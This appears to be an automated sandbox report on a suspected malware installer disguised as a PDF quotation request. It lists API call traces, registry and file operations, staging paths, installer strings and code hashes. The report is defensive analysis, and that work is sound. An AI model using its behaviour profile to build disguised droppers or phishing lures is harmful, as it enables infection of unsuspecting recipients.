                                                                                                                                  • FindFirstFileW.KERNELBASE(75923420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1974802433-0

                                                                                                                                  Control-flow Graph: entry block 403c41-403c53 (legend: Executed / Not Executed)
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                                  • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                                  • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                                  • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                                  • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3282139019-0

                                                                                                                                  Control-flow Graph

[Control-flow graph starting at node 0040389E; node and edge list not shown]
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                    • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                  • GetUserDefaultUILanguage.KERNELBASE(00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 004038B8
                                                                                                                                    • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                  • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 0040391F
                                                                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420), ref: 0040399F
                                                                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                  • API String ID: 606308-3150162093

                                                                                                                                  Control-flow Graph

[Control-flow graph starting at node 00402DEE; node and edge list not shown]
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                                    • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                    • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                  • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                  • API String ID: 4283519449-350045951

                                                                                                                                  Control-flow Graph

[Control-flow graph starting at node 00401767; node and edge list not shown]
                                                                                                                                  APIs
                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,?,00000031), ref: 004017A8
                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,?,00000031), ref: 004017CD
                                                                                                                                    • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                                    • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\nsb13EA.tmp$C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll$Call

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$wsprintf
                                                                                                                                  • String ID: jA$ jA$... %d%%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                                    • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                  • String ID: 9

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsb13EA.tmp

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                                  • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                                  • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                    • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                                                    • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                                    • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2534828695.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1791698881-3916222277
                                                                                                                                  • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                  • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                                                  • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                  • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                                  • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                  • API String ID: 1716503409-44229769
                                                                                                                                  • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                  • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                                  • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                  • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                  • wsprintfW.USER32 ref: 00406411
                                                                                                                                  • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                  • String ID: %s%S.dll
                                                                                                                                  • API String ID: 2200240437-2744773210
                                                                                                                                  • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                  • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                                  • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                                  • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 00405AC2
                                                                                                                                    • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                                    • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                                    • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,00000000,000000F0), ref: 00401645
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00401638
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving
                                                                                                                                  • API String ID: 1892508949-2989991106
                                                                                                                                  • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                                  • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                                                  • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                                  • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                                    • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                  • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                  • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                                  • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                  • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                                    • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000460,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Enum$CloseOpenValue
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000460,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsb13EA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  APIs
                                                                                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                    • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                                                    • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$EnableShow
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreate
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                                                  • GetLastError.KERNEL32 ref: 00405714
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                                                                  • GetLastError.KERNEL32 ref: 10002A6A
